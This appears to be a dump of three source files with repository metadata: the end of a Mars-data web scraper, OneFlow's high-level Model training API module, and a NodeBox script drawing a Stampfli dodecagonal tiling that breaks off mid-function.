weather_html = browser.html
soup = bs(weather_html, "html.parser")
# print(weathersoup.prettify())
mars_tweets = [soup.find_all('p', class_="TweetTextSize"), soup.find_all(
'span', class_="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0")]
for tweets in mars_tweets:
mars_tweet = tweets
for tweet in mars_tweet:
if 'InSight' in tweet.text:
mars_weather = tweet.text
if tweet.a in tweet:
mars_weather = mars_weather.strip(tweet.a.text)
break
# Mars facts
url = 'https://space-facts.com/mars/'
browser.visit(url) # not necessary, but added for checking the operation
time.sleep(1)
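    # pd.read_html parses every <table> on the page into a DataFrame; the loop
    # below keeps the first table that fits the expected two-column layout.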
dfs = pd.read_html(url)
for df in dfs:
try:
df = df.rename(columns={0: "Description", 1: "Value"})
df = df.set_index("Description")
marsfacts_html = df.to_html().replace('\n', '')
# df.to_html('marsfacts.html') # to save to a file to test
break
except:
continue
# Mars Hemispheres
base_url = 'https://astrogeology.usgs.gov'
url = base_url + '/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'
browser.visit(url)
time.sleep(1)
html = browser.html
soup = bs(html, 'html.parser')
items = soup.find_all('div', class_='item')
urls = []
titles = []
for item in items:
urls.append(base_url + item.find('a')['href'])
titles.append(item.find('h3').text.strip())
img_urls = []
for oneurl in urls:
browser.visit(oneurl)
time.sleep(1)
html = browser.html
soup = bs(html, 'html.parser')
oneurl = base_url+soup.find('img',class_='wide-image')['src']
img_urls.append(oneurl)
hemisphere_image_urls = []
for i in range(len(titles)):
hemisphere_image_urls.append({'title':titles[i],'img_url':img_urls[i]})
# Assigning scraped data to a page
marspage = {}
marspage["news_title"] = news_title
marspage["news_p"] = news_p
marspage["featured_image_url"] = featured_image_url
marspage["mars_weather"] = mars_weather
marspage["marsfacts_html"] = marsfacts_html
marspage["hemisphere_image_urls"] = hemisphere_image_urls
    browser.quit()  # close the WebDriver session once scraping is done
    return marspage
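# A minimal driver sketch (assumes chromedriver is on PATH, as above):
# if __name__ == "__main__":
#     data = scrape()
#     print(data["news_title"])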
|
[
"[email protected]"
] | |
9b53596529175476b5038508bbc734c2ba872ed0
|
35aca1291dae461d5562a3b7484e5f659ee80817
|
/oneflow/python/framework/model.py
|
9350023d6d794e8ec5ab4128b1d97683465490ed
|
[
"Apache-2.0"
] |
permissive
|
Flowingsun007/oneflow
|
e6a52cfbf5e82ca4f8b787aa026f40a2f568a10f
|
c1880c011dd453719a28d880abe15e2dab8d0da1
|
refs/heads/master
| 2023-05-11T19:18:59.220269 | 2021-05-28T20:10:35 | 2021-05-28T20:10:35 | 372,195,705 | 0 | 0 |
Apache-2.0
| 2021-06-02T09:46:51 | 2021-05-30T11:24:37 | null |
UTF-8
|
Python
| false | false | 27,327 |
py
|
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
__all__ = [
"DataModule",
"NumpyDataModule",
"TrainingConfig",
"ValidationConfig",
"CheckpointConfig",
"Callback",
"Model",
]
from abc import ABC
from typing import Optional, Any, Union, Tuple, List
import inspect
import numpy as np
import oneflow._oneflow_internal
from oneflow.python.framework.check_point_v2 import (
LoadVariables,
SaveVarDict,
GetCheckpoint,
)
from oneflow.python.framework.function_util import api_oneflow_function
from oneflow.python.framework.function_util import FunctionConfig as ExecutionConfig
from oneflow.python.framework.local_blob import LocalBlob
from oneflow.python.framework.session_util import api_clear_default_session
from oneflow.python.framework.tensor import Tensor
from oneflow.python.nn.module import Module
from oneflow.python.oneflow_export import oneflow_export
from oneflow.python.ops.optimizer import Optimizer
from oneflow.python.nn.optimizer.optimizer import Optimizer as OOPOptimizer
import oneflow.python.framework.typing as oneflow_typing
import oneflow.python.framework.dtype as dtype_util
@oneflow_export("model.DataModule")
class DataModule(Module):
def __init__(self, *args, **kwargs):
super().__init__()
def forward(self, step_idx: int = 0, optimizer_idx: int = 0):
        # Do nothing; meant to be overridden by a subclass.
pass
def infer_oneflow_data_placeholder(
self, batch: Tuple[Any] = None, optimizer_idx: int = 0
):
return None
@oneflow_export("model.NumpyDataModule")
class NumpyDataModule(DataModule):
def __init__(self, *args, **kwargs):
super().__init__()
def forward(self, step_idx: int = 0, optimizer_idx: int = 0):
        # Do nothing; meant to be overridden by a subclass.
pass
def __call__(self, *args):
ret = self.forward(*args)
return ret
def infer_oneflow_data_placeholder(
self, batch: Tuple[np.ndarray, ...] = None, optimizer_idx: int = 0
):
assert isinstance(batch, tuple), "model.NumpyDataModule must return a tuple."
data_placeholder_list = []
for item in batch:
assert isinstance(
item, np.ndarray
), "model.NumpyDataModule must return a tuple of numpy."
of_dtype = dtype_util.convert_numpy_dtype_to_oneflow_dtype(item.dtype)
numpy_placeholder = oneflow_typing.Numpy.Placeholder(
shape=item.shape, dtype=of_dtype
)
data_placeholder_list.append(numpy_placeholder)
return data_placeholder_list
@oneflow_export("model.TrainingConfig")
class TrainingConfig:
def __init__(self):
super().__init__()
self.exe_cfg = ExecutionConfig()
self.data = None
self.error_msg = ""
def config_execution(self, exe_cfg: ExecutionConfig = None):
self.exe_cfg = exe_cfg
def config_data(self, data: DataModule = None):
self.data = data
def check_valid(self):
is_valid = True
self.error_msg = ""
if not isinstance(self.exe_cfg, ExecutionConfig):
self.error_msg += "model.TrainingConfig exe_cfg is not ExecutionConfig;"
is_valid = False
if self.data is None:
self.error_msg += "model.TrainingConfig data is None;"
is_valid = False
if not isinstance(self.data, DataModule):
self.error_msg += "model.TrainingConfig data is not DataModule;"
is_valid = False
return is_valid
@oneflow_export("model.ValidationConfig")
class ValidationConfig:
def __init__(self):
super().__init__()
self.exe_cfg = ExecutionConfig()
self.data = None
self.step_interval = 10
self.error_msg = ""
def config_execution(self, exe_cfg: ExecutionConfig = None):
self.exe_cfg = exe_cfg
def config_data(self, data: DataModule = None):
self.data = data
def config_step_interval(self, step_interval: int = 1):
self.step_interval = step_interval
def check_valid(self):
is_valid = True
self.error_msg = ""
if self.data is None:
self.error_msg += "model.ValidationConfig data is None;"
is_valid = False
if not isinstance(self.data, DataModule):
self.error_msg += "model.ValidationConfig data is not DataModule;"
is_valid = False
if self.step_interval <= 0 or not isinstance(self.step_interval, int):
self.error_msg += (
"model.ValidationConfig step_interval is <= 0 or is not int;"
)
is_valid = False
return is_valid
@oneflow_export("model.CheckpointConfig")
class CheckpointConfig(object):
def __init__(self,):
self.need_load = False
self.load_dirpath = None
self.need_save = False
self.save_dirpath = None
self.save_step_interval = 1
self.error_msg = ""
def config_load(self, dirpath: str = None):
self.need_load = True
assert dirpath is not None, "dirpath should not be None"
self.load_dirpath = dirpath
def config_save(self, dirpath: str = None, step_interval: int = 1):
self.need_save = True
self.save_dirpath = dirpath
assert dirpath is not None, "dirpath should not be None"
self.save_step_interval = step_interval
assert step_interval > 0, "step_interval should not <= 0"
assert isinstance(step_interval, int), "step_interval should be int"
def check_valid(self):
# Configs has already been checked
is_valid = True
self.error_msg = ""
return is_valid
@oneflow_export("model.Callback")
class Callback(ABC):
r""" Abstract base class used to build new callbacks.
"""
def on_training_step_end(
self,
outputs: Optional[
Union[LocalBlob, Tuple[LocalBlob, ...], Tensor, Tuple[Tensor, ...]]
],
step_idx: int = 0,
optimizer_idx: int = 0,
):
        # Do nothing; meant to be overridden by a subclass.
pass
def on_validation_step_end(
self,
outputs: Optional[
Union[LocalBlob, Tuple[LocalBlob, ...], Tensor, Tuple[Tensor, ...]]
],
step_idx: int = 0,
):
        # Do nothing; meant to be overridden by a subclass.
pass
@oneflow_export("Model", "model.Model")
class Model(
ABC, Module,
):
r"""A high level API for model training and validation.
"""
def __init__(self, *args, **kwargs):
super().__init__()
self._is_deprecated_function_style = (
kwargs["is_deprecated_function_style"]
if "is_deprecated_function_style" in kwargs
else False
)
def forward(self, *args, **kwargs):
r"""Same as `nn.Module.forward()`, here is to define the operations you want to use for prediction.
"""
raise NotImplementedError
def training_step(self, *args, **kwargs):
r"""Operates on a single batch of data from the training set and return loss.
"""
raise NotImplementedError()
def validation_step(self, *args, **kwargs):
r"""Operates on a single batch of data from the validation set.
"""
raise NotImplementedError()
def configure_optimizers(self):
r"""Choose what optimizers and learning-rate schedulers to use in your optimization.
Normally you'd need one. But in the case of GANs or similar you might have multiple.
"""
raise NotImplementedError()
def fit(
self,
training_config: Optional[TrainingConfig] = None,
validation_config: Optional[ValidationConfig] = None,
checkpoint_config: Optional[CheckpointConfig] = None,
callbacks: Optional[Union[Callback, List[Callback]]] = None,
max_steps: int = 100,
):
r""" Runs the full training and validation routine.
"""
self._max_steps = max_steps
api_clear_default_session()
self._sub_models = self._get_and_check_sub_models(
training_config, validation_config, checkpoint_config, callbacks
)
if len(self._sub_models) == 0:
return
if self._checkpoint_model.is_valid:
self._checkpoint_model.load()
for step_idx in range(0, self._max_steps):
for sub_model in self._sub_models:
try:
sub_model.step(step_idx)
except Exception as e:
print(
"Model step_idx {} {} failed.".format(step_idx, sub_model.name)
)
raise e
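    # A subclass that overrides a hook replaces the attribute looked up on its
    # class, so comparing against Model's own attribute detects whether the
    # user actually implemented the method.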
def method_overrided(self, method_name: str = None) -> bool:
return getattr(self.__class__, method_name) != getattr(Model, method_name)
def _get_and_check_sub_models(
self,
training_config: Optional[TrainingConfig] = None,
validation_config: Optional[ValidationConfig] = None,
checkpoint_config: Optional[CheckpointConfig] = None,
callbacks: Optional[Union[Callback, List[Callback]]] = None,
):
sub_models = []
self._train_model = (
TrainModel(training_config, self, callbacks)
if self._is_deprecated_function_style
else TrainModelOOPStyle(training_config, self, callbacks)
)
if self._train_model.is_valid:
sub_models.append(self._train_model)
else:
if training_config is not None:
print(
self._train_model.error_msg,
"{}'s fit() will not do training.".format(self.__class__.__name__),
)
self._val_model = (
ValidateModel(validation_config, self, callbacks)
if self._is_deprecated_function_style
else ValidateModelOOPStyle(validation_config, self, callbacks)
)
if self._val_model.is_valid:
sub_models.append(self._val_model)
else:
if validation_config is not None:
print(
self._val_model.error_msg,
"{}'s fit() will not do validation.".format(
self.__class__.__name__
),
)
if len(sub_models) == 0:
print(
"{}'s fit() will do nothing because there has no valid configuration.".format(
self.__class__.__name__
)
)
return sub_models
self._checkpoint_model = (
CheckpointModel(checkpoint_config, self, callbacks)
if self._is_deprecated_function_style
else CheckpointModelOOPStyle(checkpoint_config, self, callbacks)
)
if self._checkpoint_model.is_valid:
sub_models.append(self._checkpoint_model)
else:
if checkpoint_config is not None:
print(
self._checkpoint_model.error_msg,
"{}'s fit() will not do checkpoint.".format(
self.__class__.__name__
),
)
return sub_models
class SubModel(ABC):
def __init__(self, name, cfg, model, callbacks):
self._cfg = cfg
assert isinstance(model, Model)
self._model = model
self._cbs = callbacks
self.name = name
self.is_valid = True
self.error_msg = (
self._model.__class__.__name__ + " " + self.name + " error message: "
)
if not self._get_and_check_cfg():
self.is_valid = False
if not self._get_and_check_cbs():
self.is_valid = False
def step(self, step_idx: int = 0):
raise NotImplementedError
def _get_and_check_cfg(self):
if self._cfg is None:
self.error_msg += "config is None;"
return False
if not self._cfg.check_valid():
self.error_msg += self._cfg.error_msg
return False
else:
return True
def _get_and_check_cbs(self):
if self._cbs is None:
self._cbs = []
return True
if isinstance(self._cbs, Callback):
self._cbs = [self._cbs]
return True
if isinstance(self._cbs, list):
for cb in self._cbs:
assert isinstance(
cb, Callback
), "model callbacks' type must be model.Callback or List[model.Callback]."
return True
assert (
False
), "model callbacks' type must be model.Callback or List[model.Callback]."
def _method_callback(self, method_name: str = None, *args, **kwargs):
for cb in self._cbs:
method = getattr(cb, method_name)
method(*args, **kwargs)
class TrainModel(SubModel):
def __init__(
self,
cfg: TrainingConfig = None,
model: Model = None,
callbacks: Optional[Union[Callback, List[Callback]]] = None,
):
super().__init__("training", cfg, model, callbacks)
if not self._get_and_check_step():
self.is_valid = False
if not self._get_and_check_opts():
self.is_valid = False
if self.is_valid and not self._get_and_check_jobs():
self.is_valid = False
def step(self, step_idx: int = 0):
assert self.is_valid, self.error_msg
for optimizer_idx in range(0, len(self._opts)):
outputs = None
if self._is_numpy_input:
batch = None
if step_idx == 0:
batch = self._first_numpy_batch[optimizer_idx]
else:
batch = self._cfg.data(step_idx, optimizer_idx)
outputs = self._jobs[optimizer_idx](*batch).get()
else:
outputs = self._jobs[optimizer_idx]().get()
self._method_callback(
"on_training_step_end",
outputs=outputs,
step_idx=step_idx,
optimizer_idx=optimizer_idx,
)
def _get_and_check_step(self):
if not self._model.method_overrided("training_step"):
self.error_msg += "model.training_step() is empty;"
return False
else:
return True
def _get_and_check_opts(self):
self._opts = []
if not self._model.method_overrided("configure_optimizers"):
self.error_msg += "model.configure_optimizers() is empty;"
return False
opt_conf = self._model.configure_optimizers()
if isinstance(opt_conf, Optimizer):
self._opts = [opt_conf]
elif isinstance(opt_conf, (list, tuple)):
for opt in opt_conf:
assert isinstance(
opt, Optimizer
), "model.configure_optimizers() must return Optimizer \
or List[Optimizer, ...] or Tuple[Optimizer, ...]"
self._opts = opt_conf
else:
assert (
False
), "model.configure_optimizers() must return Optimizer \
or List[Optimizer, ...] or Tuple[Optimizer, ...]"
return True
def _get_and_check_jobs(self):
        # TODO(strint): remove numpy handling from the sub-model
        self._is_numpy_input = isinstance(self._cfg.data, NumpyDataModule)
self._jobs = []
if self._is_numpy_input:
self._first_numpy_batch = []
for optimizer_idx in range(0, len(self._opts)):
batch = self._cfg.data(0, optimizer_idx)
self._first_numpy_batch.insert(optimizer_idx, batch)
self._jobs.insert(
optimizer_idx, self._construct_numpy_job(batch, optimizer_idx)
)
else:
for optimizer_idx in range(0, len(self._opts)):
self._jobs.insert(optimizer_idx, self._construct_job(optimizer_idx))
return True
def _construct_job(self, optimizer_idx: int = 0):
def job():
batch = self._cfg.data(0, optimizer_idx)
outputs = self._model.training_step(
batch=batch, optimizer_idx=optimizer_idx
)
loss = None
if isinstance(outputs, tuple) and len(outputs) > 0:
loss = outputs[0]
else:
loss = outputs
self._opts[optimizer_idx].minimize(loss)
return outputs
job.__name__ = (
self._model.__class__.__name__ + "_Model_train_job_" + str(optimizer_idx)
)
deco = api_oneflow_function(type="train", function_config=self._cfg.exe_cfg)
return deco(job)
def _construct_numpy_job(self, batch, optimizer_idx):
def job(*input_batch):
outputs = self._model.training_step(
batch=input_batch, optimizer_idx=optimizer_idx
)
loss = None
if isinstance(outputs, tuple) and len(outputs) > 0:
loss = outputs[0]
else:
loss = outputs
self._opts[optimizer_idx].minimize(loss)
return outputs
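        # The oneflow function decorator reads type annotations to build its
        # input blobs, so a signature matching the numpy batch is synthesized
        # onto `job` before decoration (see _infer_job_signature below).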
_infer_job_signature(self._cfg.data, batch, optimizer_idx, job)
job.__name__ = (
self._model.__class__.__name__
+ "_Model_train_numpy_job_"
+ str(optimizer_idx)
)
deco = api_oneflow_function(type="train", function_config=self._cfg.exe_cfg)
return deco(job)
class ValidateModel(SubModel):
def __init__(
self,
cfg: ValidationConfig = None,
model: Model = None,
callbacks: Optional[Union[Callback, List[Callback]]] = None,
):
super().__init__("validation", cfg, model, callbacks)
if not self._get_and_check_step():
self.is_valid = False
if self.is_valid and not self._get_and_check_job():
self.is_valid = False
def step(self, step_idx: int = 0):
assert self.is_valid
if (step_idx + 1) % self._cfg.step_interval == 0:
outputs = None
if self._is_numpy_input:
batch = None
if step_idx == 0:
batch = self._first_numpy_batch
else:
batch = self._cfg.data(step_idx, 0)
outputs = self._job(*batch).get()
else:
outputs = self._job().get()
self._method_callback(
"on_validation_step_end", step_idx=step_idx, outputs=outputs,
)
def _get_and_check_step(self):
if not self._model.method_overrided("validation_step"):
self.error_msg += "model.validation_step() is empty;"
return False
else:
return True
def _get_and_check_job(self):
        # TODO(strint): remove numpy handling from the sub-model
        self._is_numpy_input = isinstance(self._cfg.data, NumpyDataModule)
self._job = None
if not self._is_numpy_input:
self._job = self._construct_job()
else:
batch = self._cfg.data(0, 0)
self._first_numpy_batch = batch
self._job = self._construct_numpy_job(batch)
return True
def _construct_job(self):
def job():
batch = self._cfg.data(0, 0)
return self._model.validation_step(batch)
job.__name__ = self._model.__class__.__name__ + "_Model_eval_job"
deco = api_oneflow_function(type="predict", function_config=self._cfg.exe_cfg)
return deco(job)
def _construct_numpy_job(self, batch: Tuple[np.ndarray, ...] = None):
def job(*input_batch):
return self._model.validation_step(batch=input_batch)
_infer_job_signature(self._cfg.data, batch, 0, job)
job.__name__ = self._model.__class__.__name__ + "_Model_eval_numpy_job"
deco = api_oneflow_function(type="predict", function_config=self._cfg.exe_cfg)
return deco(job)
class CheckpointModel(SubModel):
def __init__(
self,
cfg: CheckpointConfig = None,
model: Model = None,
callbacks: Optional[Union[Callback, List[Callback]]] = None,
):
super().__init__("checkpointing", cfg, model, callbacks)
def load(self):
assert self.is_valid
if self._cfg.need_load:
self._load_checkpoint(self._cfg.load_dirpath)
def step(self, step_idx: int = 0):
assert self.is_valid
if self._cfg.need_save:
if (step_idx + 1) % self._cfg.save_step_interval == 0:
self._save_checkpoint(
dirpath=self._cfg.save_dirpath + "-" + str(step_idx)
)
def _load_checkpoint(
self, dirpath: str,
):
r"""Load model states from a checkpoint.
"""
LoadVariables(GetCheckpoint(path=dirpath))
def _save_checkpoint(
self, dirpath: str,
):
r"""Save model states as a checkpoint.
"""
SaveVarDict(path=dirpath)
class TrainModelOOPStyle(SubModel):
def __init__(
self,
cfg: TrainingConfig = None,
model: Model = None,
callbacks: Optional[Union[Callback, List[Callback]]] = None,
):
super().__init__("training", cfg, model, callbacks)
if not self._get_and_check_step():
self.is_valid = False
if not self._get_and_check_opts():
self.is_valid = False
def step(self, step_idx: int = 0):
assert self.is_valid, self.error_msg
for optimizer_idx in range(0, len(self._opts)):
batch = self._cfg.data(step_idx, optimizer_idx)
outputs = self._model.training_step(
batch=batch, optimizer_idx=optimizer_idx
)
loss = None
if isinstance(outputs, tuple) and len(outputs) > 0:
loss = outputs[0]
else:
loss = outputs
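            # Eager-style update: backpropagate, apply the gradients, then
            # clear them for the next optimizer step.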
loss.backward()
opt = self._opts[optimizer_idx]
opt.step()
opt.zero_grad()
self._method_callback(
"on_training_step_end",
outputs=outputs,
step_idx=step_idx,
optimizer_idx=optimizer_idx,
)
def _get_and_check_step(self):
if not self._model.method_overrided("training_step"):
self.error_msg += "model.training_step() is empty;"
return False
else:
return True
def _get_and_check_opts(self):
self._opts = []
if not self._model.method_overrided("configure_optimizers"):
self.error_msg += "model.configure_optimizers() is empty;"
return False
opt_conf = self._model.configure_optimizers()
if isinstance(opt_conf, OOPOptimizer):
self._opts = [opt_conf]
elif isinstance(opt_conf, (list, tuple)):
for opt in opt_conf:
assert isinstance(
opt, OOPOptimizer
), "model.configure_optimizers() must return Optimizer \
or List[Optimizer, ...] or Tuple[Optimizer, ...]"
self._opts = opt_conf
else:
assert (
False
), "model.configure_optimizers() must return Optimizer \
or List[Optimizer, ...] or Tuple[Optimizer, ...]"
return True
class ValidateModelOOPStyle(SubModel):
def __init__(
self,
cfg: ValidationConfig = None,
model: Model = None,
callbacks: Optional[Union[Callback, List[Callback]]] = None,
):
super().__init__("validation", cfg, model, callbacks)
if not self._get_and_check_step():
self.is_valid = False
def step(self, step_idx: int = 0):
assert self.is_valid
if (step_idx + 1) % self._cfg.step_interval == 0:
outputs = None
with oneflow._oneflow_internal.autograd.no_grad():
inputs = self._cfg.data(step_idx, 0)
model_previous_mode = self._model.training
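                # NOTE: switching to train() while validating looks
                # unintended; eval() is presumably the intent here.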
self._model.train()
outputs = self._model.validation_step(inputs)
self._model.train(model_previous_mode)
self._method_callback(
"on_validation_step_end", step_idx=step_idx, outputs=outputs,
)
def _get_and_check_step(self):
if not self._model.method_overrided("validation_step"):
self.error_msg += "model.validation_step() is empty;"
return False
else:
return True
class CheckpointModelOOPStyle(SubModel):
def __init__(
self,
cfg: CheckpointConfig = None,
model: Model = None,
callbacks: Optional[Union[Callback, List[Callback]]] = None,
):
super().__init__("checkpointing", cfg, model, callbacks)
def load(self):
assert self.is_valid
if self._cfg.need_load:
self._load_checkpoint(self._cfg.load_dirpath)
def step(self, step_idx: int = 0):
assert self.is_valid
if self._cfg.need_save:
if (step_idx + 1) % self._cfg.save_step_interval == 0:
self._save_checkpoint(
dirpath=self._cfg.save_dirpath + "-" + str(step_idx)
)
def _load_checkpoint(
self, dirpath: str,
):
r"""Load model states from a checkpoint.
"""
stat_dict = GetCheckpoint(path=dirpath)
self._model.load_state_dict(stat_dict)
def _save_checkpoint(
self, dirpath: str,
):
r"""Save model states as a checkpoint.
"""
stat_dict = self._model.state_dict()
SaveVarDict(path=dirpath, var_dict=stat_dict)
def _infer_job_signature(data_module, batch, optimizer_idx, job):
para_list = []
placeholder_list = data_module.infer_oneflow_data_placeholder(batch, optimizer_idx)
for i, placeholder in enumerate(placeholder_list):
para_name = (
data_module.__class__.__name__
+ "_opt_"
+ str(optimizer_idx)
+ "_para_"
+ str(i)
)
para_list.append(
inspect.Parameter(
name=para_name,
kind=inspect.Parameter.POSITIONAL_OR_KEYWORD,
annotation=placeholder,
)
)
origin_sig = inspect.signature(job)
new_sig = origin_sig.replace(parameters=para_list)
job.__oneflow_function_signature__ = new_sig
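# A minimal usage sketch (hypothetical model, deprecated function style):
#
#   class MyModel(Model):
#       def __init__(self):
#           super().__init__(is_deprecated_function_style=True)
#       def training_step(self, batch, optimizer_idx=0):
#           ...  # return the loss (or a tuple whose first item is the loss)
#       def configure_optimizers(self):
#           ...  # return an Optimizer or a list/tuple of them
#
#   MyModel().fit(training_config=..., max_steps=100)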
|
[
"[email protected]"
] | |
fedbff6cef607c4f5ded4728ec4c5275e3036a1c
|
9380b3005eb777feb57d8b914091ab9e839e32fd
|
/stampfli.py
|
7bd02cf0b4d4e0e4f33fb696d4d7c6ae17175bc3
|
[] |
no_license
|
vitroid/StampfliTiling
|
57398f4aa269f0aeed502aedc0486f774e0c6792
|
cbc319216fca7f76912f26ab03b1402b9e188064
|
refs/heads/master
| 2022-05-02T06:55:39.049840 | 2011-09-22T23:43:28 | 2011-09-22T23:43:28 | 2,440,927 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 9,840 |
py
|
#Put the initial vertex
#subdivide with dodecagon and register new vertices
from math import *
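# NOTE: this script targets NodeBox 1.x, whose environment injects the drawing
# primitives used below (line, oval, stroke, rect, colormode, ...); it is
# Python 2 code and will not run under plain CPython 3.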
blue = 1
red = -1
triangle_top = 0
triangle_left = 1
triangle_right = 2
theta = pi*15.0/180.0
ratio = 0.5 * tan(theta)
ratio2 = 0.5 / cos(theta)
matrix12 = ((cos(theta*2),sin(theta*2)),
(-sin(theta*2),cos(theta*2)))
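# matrix12 rotates a 2-vector by 2*theta = 30 degrees (one twelfth of a turn,
# matching the 12-fold symmetry of the dodecagonal tiling).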
def mul(mat,vec):
return ((mat[0][0]*vec[0]+mat[0][1]*vec[1]),
(mat[1][0]*vec[0]+mat[1][1]*vec[1]))
def add(vec1,vec2):
return (vec1[0]+vec2[0],vec1[1]+vec2[1])
def sub(vec1,vec2):
return (vec1[0]-vec2[0],vec1[1]-vec2[1])
def wrap(c):
return (c[0]-floor(c[0]/box[0]+0.5)*box[0],
c[1]-floor(c[1]/box[1]+0.5)*box[1])
def sub_pbc(vec1,vec2):
dx = vec1[0]-vec2[0]
dy = vec1[1]-vec2[1]
return wrap((dx,dy))
def drawpoly( coord ):
for i in range(len(coord)):
line(coord[i-1][0],coord[i-1][1],
coord[i ][0],coord[i ][1])
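# Inflation rules: each triangle/square of the parent tiling is subdivided by
# placing new vertices at fixed offsets from its corners (the square-triangle
# substitution behind the Stampfli tiling; see inflate() below).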
def subdiv_triangle(v):
for i in range(3):
dijx,dijy = edges[v[i]][v[i-1]]
dikx,diky = edges[v[i]][v[i-2]]
p = (coord[v[i]][0] + (dijx+dikx)*(0.5 - ratio / sqrt(3.0)),
coord[v[i]][1] + (dijy+diky)*(0.5 - ratio / sqrt(3.0)))
coord.append(p)
def subdiv_square(v):
for i in range(4):
#relative diagonal vector of the square
d = (edges[v[i]][v[i-1]][0]+edges[v[i-1]][v[i-2]][0],
edges[v[i]][v[i-1]][1]+edges[v[i-1]][v[i-2]][1])
p0 = (d[0]/sqrt(2)*ratio2,
d[1]/sqrt(2)*ratio2)
p = add(coord[v[i]],p0)
coord.append(p)
p1 = mul(matrix12,p0)
p = add(coord[v[i]],p1)
coord.append(p)
def hexagon(center,edge,parity):
r = edge * ratio * 2.0
for i in range(6):
coord.append(add(center,(r*cos((i*2+parity)*pi/6),r*sin((i*2+parity)*pi/6))))
def bond(coord,thres):
edges = dict()
for i in range(len(coord)):
edges[i] = dict()
for i in range(len(coord)):
for j in range(i+1,len(coord)):
dx,dy = sub_pbc(coord[j],coord[i])
if dx**2+dy**2 < thres**2 * 1.01:
edges[i][j] = (dx,dy)
edges[j][i] = (-dx,-dy)
return edges
def dictoflist_add(dol,key,value):
if not dol.has_key(key):
dol[key] = []
dol[key].append(value)
SAMECOLOR = 1
DIFFCOLOR = -1
def setcolors(en,ec,e,col):
if ec.has_key(e):
return
ec[e] = col
#print e,col
for i,j,parity in en[e]:
setcolors(en,ec,(i,j),col * parity)
def findrings(edges):
#look for rings
sq = []
tr = []
edgeneighbor = dict()
for i in edges:
for j in edges[i]:
for k in edges[i]:
if i < j and i < k and j < k:
if edges[j].has_key(k):
#must be compact
dx = edges[i][j][0] + edges[j][k][0] + edges[k][i][0]
dy = edges[i][j][1] + edges[j][k][1] + edges[k][i][1]
if abs(dx)<0.001 and abs(dy) < 0.001:
tr.append((i,j,k))
dictoflist_add(edgeneighbor,(i,j),(i,k,SAMECOLOR))
dictoflist_add(edgeneighbor,(i,j),(j,k,SAMECOLOR))
dictoflist_add(edgeneighbor,(i,k),(i,j,SAMECOLOR))
dictoflist_add(edgeneighbor,(i,k),(j,k,SAMECOLOR))
dictoflist_add(edgeneighbor,(j,k),(i,j,SAMECOLOR))
dictoflist_add(edgeneighbor,(j,k),(i,k,SAMECOLOR))
else:
for l in edges[j]:
if edges[k].has_key(l):
if l > i:
if not edges[i].has_key(l):
#must be compact
dx = edges[i][j][0] + edges[j][l][0] + edges[l][k][0] + edges[k][i][0]
dy = edges[i][j][1] + edges[j][l][1] + edges[l][k][1] + edges[k][i][1]
if abs(dx)<0.001 and abs(dy) < 0.001:
sq.append((i,j,l,k))
kk,kl = k,l
if k > l:
kk,kl = l,k
jj,jl = j,l
if j > l:
jj,jl = l,j
dictoflist_add(edgeneighbor,(i,j),(i,k,DIFFCOLOR))
dictoflist_add(edgeneighbor,(i,k),(i,j,DIFFCOLOR))
dictoflist_add(edgeneighbor,(i,k),(kk,kl,DIFFCOLOR))
dictoflist_add(edgeneighbor,(kk,kl),(i,k,DIFFCOLOR))
dictoflist_add(edgeneighbor,(kk,kl),(jj,jl,DIFFCOLOR))
dictoflist_add(edgeneighbor,(jj,jl),(kk,kl,DIFFCOLOR))
dictoflist_add(edgeneighbor,(i,j),(jj,jl,DIFFCOLOR))
dictoflist_add(edgeneighbor,(jj,jl),(i,j,DIFFCOLOR))
dictoflist_add(edgeneighbor,(i,j),(kk,kl,SAMECOLOR))
dictoflist_add(edgeneighbor,(i,k),(jj,jl,SAMECOLOR))
dictoflist_add(edgeneighbor,(kk,kl),(i,j,SAMECOLOR))
dictoflist_add(edgeneighbor,(jj,jl),(i,k,SAMECOLOR))
return tr,sq,edgeneighbor
def inflate(coord,edge,triangles,squares,depth):
clen = len(coord)
if depth == 0:
for i in range(clen):
            hexagon(coord[i],edge,0) # last number is the direction of the hexagon
else:
for i in range(clen):
            #hexagon(coord[i],edge,i%2) # last number is the direction of the hexagon
            hexagon(coord[i],edge,0) # last number is the direction of the hexagon
for triangle in triangles:
subdiv_triangle(triangle)
for square in squares:
subdiv_square(square)
return coord
def draw(coord,edge,tr,sq,edgeneighbor):
i = 0
for c in coord:
stroke(0)
nofill()
x,y = wrap(c)
oval( x-4,y-4,8,8 )
nostroke()
fill(0)
oval( x-2,y-2,4,4 )
#text("%s" % i,c[0],c[1] )
i += 1
#return
edgecolors = dict()
i = edges.keys()[0]
j = edges[i].keys()[0]
if i > j:
i,j = j,i
setcolors(edgeneighbor,edgecolors,(i,j),red)
for i in edges:
for j in edges[i]:
if i < j:
dx,dy = edges[i][j]
ij = (coord[i][0]+dx*0.5,
coord[i][1]+dy*0.5)
x,y = wrap(ij)
if edgecolors[(i,j)] == red:
stroke(0)
nofill()
oval( x-3,y-3,6,6 )
stroke(0,1,1)
else:
nostroke()
fill(0)
oval( x-3,y-3,6,6 )
stroke(0.666,1,1)
x,y = wrap(coord[i])
line(x,y,x+dx,y+dy)
for i,j,k in tr:
dijx,dijy = edges[i][j]
dikx,diky = edges[i][k]
center = (coord[i][0]+(dijx+dikx)/3,
coord[i][1]+(dijy+diky)/3)
x,y = wrap(center)
if edgecolors[(i,j)] == red:
nostroke()
fill(0)
else:
stroke(0)
nofill()
oval(x-3,y-3,6,6)
#text("(%s,%s,%s)" % (i,j,k), center[0]+5,center[1]+5)
#print (i,j,k),center
for i,j,l,k in sq:
p = 3.0/8.0
q = 1.0/8.0
dijx,dijy = edges[i][j]
dikx,diky = edges[i][k]
dilx,dily = dijx+dikx, dijy+diky
ij = (coord[i][0] + dijx*p + dikx*q + dilx*q,
coord[i][1] + dijy*p + diky*q + dily*q)
ik = (coord[i][0] + dijx*q + dikx*p + dilx*q,
coord[i][1] + dijy*q + diky*p + dily*q)
jl = (coord[i][0] + dijx*p + dikx*q + dilx*p,
